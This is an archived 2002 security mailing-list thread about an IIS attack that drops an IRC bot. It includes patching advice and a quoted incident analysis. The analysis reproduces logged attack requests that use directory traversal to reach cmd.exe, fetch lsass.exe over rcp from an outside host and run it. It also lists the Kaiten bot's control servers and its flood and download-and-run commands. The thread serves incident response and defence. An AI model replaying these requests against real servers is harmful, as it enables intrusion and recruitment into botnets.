|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: John Campbell (jcampbell_at_wsipc.org)
Date: Tue Sep 24 2002 - 16:08:57 CDT
Windows Update from you-know-who actually does what you describe. I'd
always been leery of it, but tried it out recently when setting up a W2K
test server, and it performed as advertised. It did take several
iterations to get everything updated, owing to various dependencies.
Regards,
John Campbell, CISSP, GCWN
Information Security Engineer
Washington School Information Processing Cooperative
(WSIPC)
Everett, Washington, USA
-----Original Message-----
From: zeno [mailto:bugtraq
cgisecurity.net]
Sent: Tuesday, September 24, 2002 11:29 AM
To: Mark Challender
Cc: 'pjesec.dk'; incidentssecurityfocus.com
Subject: Re: new IIS worm? (rcp lsass.exe)
>
> Hardening of IIS with the tools available at Microsoft and using
> URLSCAN with the EXE blocking on will stop these attacks.
>
> Patch, patch, patch, recheck the patches and use URLSCAN!
Does anyone know of a gui windows tool that scans your system and
provides you with a list of needed patches, and then allows you to
select, and have it autodownload and install them? I can't seem to find
one (needed mostly for iis).
- zenocgisecurity.com
>
> Mark Challender
> Network Administrator
>
> ==================
> Veni, Vidi, Geeki
> ==================
>
>
> -----Original Message-----
> From: pjesec.dk [mailto:pjesec.dk]
> Sent: Monday, September 23, 2002 3:27 AM
> To: incidentssecurityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
>
> Christian Mock:
>
> >Then it seems to go after the web servers, sending the following:
>
> >GET
> /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsas
> s.exe+
> .
> HTTP/1.0..
>
> >and
>
> >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
>
> >I've been able to get hold of that lsass.exe binary (9728 bytes), but
> >I lack the skills to analyze it; I'll happily mail it to anybody who
> >asks.
>
>
> We have seen this attack from 4 different sources since Sept. 16, and
> have informed the owner of 64.21.95.7 and downloaded the lsass.exe for
> investigation.
>
> Based on the attack rate this is most likely a scripted or manual
> attack, not a worm.
>
> Judging from the embedded string in this compressed binary it
> appears to be an IRC bot based on the kaiten.c code written by
> contemefnet, the author of the Slapper worm :
>
> Kaiten Win32 API version 2002 by contemefnet
>
> The binary contains these domainnames, most likeky IRC servers used
> for controlling the bot:
>
> telsa5.mine.nu (Korea)
> irc.logicfive.net (Taiwan)
> moncredo.shacknet.nu (USA)
> telsacredo.shacknet.nu (USA)
> lar.ath.cx (Taiwan)
>
> The program accepts commands to make various DOS attacks or download
> new version or executables with http:
>
> NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> NOTICE %s :NICK <nick> = Changes the nick of the
client
> NOTICE %s :DISABLE <pass> = Disables all packeting from
this
> client
> NOTICE %s :ENABLE <pass> = Enables all packeting from
this
> client
> NOTICE %s :UPDATE <http address> = Downloads a file off the
web and
> updates the client
> NOTICE %s :RUN <http address> = Downloads a file off the
web and
> runs it
> NOTICE %s :GET <http address> = Downloads a file off the
web
> NOTICE %s :ADDSERVER <server> = Adds a server to the list
> NOTICE %s :DELSERVER <server> = Deletes a server from the
list
> NOTICE %s :LISTSERVERS = Lists server on the list
> NOTICE %s :KILL = Kills the client
> NOTICE %s :VERSION = Requests version of client
> NOTICE %s :HELP = Displays this
>
>
> There seems also to be a default account and password in the german
> language included in this specific version of Kaiten.
>
> The IIS attack that tries to inject this Trojan usually has another
> URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an
> connection to port 6667(IRC) on chat.vtm.be.
>
>
>
> Peter Jelver
> ...
>
> eSec A/S
>
> http://www.esec.dk
> ......................................................................
> ......
> .
>
> PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
>
>
>
>
>
> ----------------------------------------------------------------------
> ------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
> ----------------------------------------------------------------------
> ------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]